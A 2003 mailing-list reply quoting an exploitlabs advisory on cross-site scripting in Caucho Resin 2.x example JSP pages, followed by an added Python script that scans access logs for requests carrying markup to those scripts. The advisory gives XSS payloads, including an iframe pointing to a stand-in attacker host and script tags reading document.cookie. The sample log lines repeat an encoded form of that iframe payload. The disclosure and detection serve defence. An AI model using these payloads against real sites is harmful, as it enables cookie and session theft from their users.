From: jkuperus at planet.nl (jelmer)
Subject: Caucho Resin 2.x - Cross Site Scripting

Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status.
These are basic procedures in setting up a server.


--jelmer





----- Original Message ----- 
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> -----------------------------------------------------------------
>           - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
>                               -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vulnerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin? is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VULNERABILITY / EXPLOIT
> =======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
> http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
> or
>
> <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
>
> the above is only an example, all cookie and session
>  stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistent XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x don't have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@...cho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@...labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
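
Whether the example applications discussed in this thread are still reachable on a server, and whether anyone has sent markup to them, can be read from the access log. The following is an added example, not part of either message and not Caucho code: it assumes common/combined log format, and the log entries (addresses, timestamps, sizes, and the location of env.jsp under /examples/) are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts named in the advisory; guestbook.jsp is the persistent case.
AFFECTED = {"env.jsp", "form.jsp", "session.jsp", "tictactoe.jsp", "guestbook.jsp"}
# An opening or closing HTML tag inside a parameter value.
TAG = re.compile(r"<\s*/?\s*[a-z]", re.I)
# Request line of a common/combined log format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return None, 'example-app-reachable' or 'markup-in-parameter'."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower()
    if "/examples/" not in path or path.rsplit("/", 1)[-1] not in AFFECTED:
        return None
    # parse_qsl decodes once; unquote again to catch double-encoded markup.
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        if TAG.search(unquote(value)):
            return "markup-in-parameter"
    return "example-app-reachable"

def scan(lines):
    """Return (line_number, verdict) for every log line worth a look."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample entries (addresses, timestamps, sizes and the env.jsp path are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2003:12:40:01 +0000] "GET /index.jsp HTTP/1.0" 200 512',
    '192.0.2.11 - - [19/Oct/2003:12:41:07 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=4 HTTP/1.0" 200 2048',
    '192.0.2.12 - - [19/Oct/2003:12:41:30 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2F%22%3E%3C%2Fiframe%3E4 HTTP/1.0" 200 2101',
    '192.0.2.13 - - [19/Oct/2003:12:42:02 +0000] "GET /examples/env.jsp?name=%253Cscript%253E HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Any "example-app-reachable" hit already means the examples are still deployed. Input sent in a request body, such as guestbook form fields submitted by POST, does not appear in the request line, so for those the log shows reachability only.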

